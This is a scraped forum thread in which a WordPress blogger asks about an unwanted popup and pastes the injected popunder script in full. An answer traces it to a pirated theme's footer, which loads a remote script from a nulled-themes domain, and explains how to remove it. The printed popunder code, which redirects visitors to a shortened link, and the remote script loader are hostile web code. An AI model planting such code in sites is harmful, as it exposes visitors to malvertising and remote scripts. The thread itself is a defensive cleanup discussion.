Malicious popup injected in my Wordpress site -


i setup own blog using wordpress. don't have lots of experience think managed ok create nice. here's link, http://blog.yveschaput.com (it's in french)

my problem have popup coming when 1 clicking first time on link on site. once popups, doesn't reappear again until seems randomly set time or event. injected javascript script in page visitor first viewing, not in home page.

anyone has idea script might come from? i'm guessing plugin use can't seem find one.

here's code being injected:

var pushown = false; var popwidth = 1370; var popheight = 800; var popfocus = 0; var _top = null;  function getwindowheight() { var myheight = 0; if( typeof( _top.window.innerheight ) == 'number' ) { myheight = _top.window.innerheight; } else if( _top.document.documentelement && _top.document.documentelement.clientheight ) { myheight = _top.document.documentelement.clientheight; } else if( _top.document.body && _top.document.body.clientheight ) { myheight = _top.document.body.clientheight; } return myheight; }  function getwindowwidth() { var mywidth = 0; if( typeof( _top.window.innerwidth ) == 'number' ) { mywidth = _top.window.innerwidth; } else if( _top.document.documentelement && _top.document.documentelement.clientwidth ) { mywidth = _top.document.documentelement.clientwidth; } else if( _top.document.body && _top.document.body.clientwidth ) { mywidth = _top.document.body.clientwidth; } return mywidth; }  function getwindowtop() { return (_top.window.screentop != undefined) ? _top.window.screentop : _top.window.screeny; }  function getwindowleft() { return (_top.window.screenleft != undefined) ? _top.window.screenleft : _top.window.screenx; }  function doopen(url) { var popurl = "about:blank" var popid = "ad_" + math.floor(89999999*math.random()+10000000); var pxleft = 0; var pxtop = 0; pxleft = (getwindowleft() + (getwindowwidth() / 2) - (popwidth / 2)); pxtop = (getwindowtop() + (getwindowheight() / 2) - (popheight / 2));  if ( pushown == true ) { return true; }  var popwin=_top.window.open(popurl,popid,'toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=' + pxtop + ',left=' + pxleft + ',width=' + popwidth + ',height=' + popheight);  if (popwin) { pushown = true;  if (popfocus == 0) { popwin.blur();  if (navigator.useragent.tolowercase().indexof("applewebkit") > -1) { _top.window.blur(); _top.window.focus(); } }  popwin.init = function(e) {  (e) {  params = e.params; main = function(){  if (typeof window.mozpaintcount != "undefined") { var x = window.open("about:blank"); x.close();  }  var popurl = params.popurl;  try { opener.window.focus(); } catch (err) { }  window.location = popurl; }  main(); } };  popwin.params = { popurl: url }  popwin.init(popwin); }  return popwin; }  function setcookie(name, value, time) { var expires = new date();  expires.settime( expires.gettime() + time );  document.cookie = name + '=' + value + '; path=/;' + '; expires=' + expires.togmtstring() ; }  function getcookie(name) { var cookies = document.cookie.tostring().split('; '); var cookie, c_name, c_value;  (var n=0; n<cookies.length; n++) { cookie  = cookies[n].split('='); c_name  = cookie[0]; c_value = cookie[1];  if ( c_name == name ) { return c_value; } }  return null; }  function initpu() {  _top = self;  if (top != self) { try { if (top.document.location.tostring()) _top = top; } catch(err) { } }  if ( document.attachevent ) { document.attachevent( 'onclick', checktarget ); } else if ( document.addeventlistener ) { document.addeventlistener( 'click', checktarget, false ); } }  function checktarget(e) { if ( !getcookie('popundr') ) { var e = e || window.event; var win = doopen('http://bit.ly/1cbiszv'); setcookie('popundr', 1, 24*60*60*1000); } }  initpu(); 

the code being injected hacked theme, @ footer. can see in source code, before injected code can see code injected too:

<script type="text/javascript">     if(!document.referrer || document.referrer == '') {         document.write('<scr'+'ipt type="text/javascript" src="http://theme.nulledclonescripts.com/jquery.min.js"></scr'+'ipt>');     } else {         document.write('<scr'+'ipt type="text/javascript"  src="http://theme.nulledclonescripts.com/jquery.min.js"></scr'+'ipt>');     } </script> 

and can see quote theme.nulledclonescripts.com, , code injected after quote appears <!-- wp_footer --> code included in footer file.

that's bad thing hacking themes instead of buying them, come malicious scripts.

to remove use notepad notepad++ , use function search in files , search this: bit.ly/1cbiszv, remove malicious code.

semi offtopic quote:

as quote hacking/cracking software , it's bad consequences final user, read too: http://www.android-app-development.ie/blog/2013/03/06/inserting-keylogger-code-in-android-swiftkey-using-apktool/

if user hacks android software too, maybe passwords everywhere on internet. i'm not getting angry you, download hacked software too, i'm warning being careful when doing that.


Comments

Popular posts from this blog

Django REST Framework perform_create: You cannot call `.save()` after accessing `serializer.data` -

Why does Go error when trying to marshal this JSON? -